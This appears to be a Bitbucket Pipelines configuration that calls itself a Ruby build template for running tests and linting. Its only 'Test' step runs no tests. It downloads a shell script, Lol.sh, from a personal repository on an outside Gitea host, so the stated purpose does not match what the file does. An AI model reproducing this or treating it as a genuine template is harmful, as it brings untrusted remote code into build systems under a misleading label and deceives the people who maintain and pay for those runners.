#  Template Ruby build

#  This template allows you to validate your Ruby code.
#  The workflow allows running tests and code linting on the default branch.

image: ruby:2.7

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          script:
            - wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh
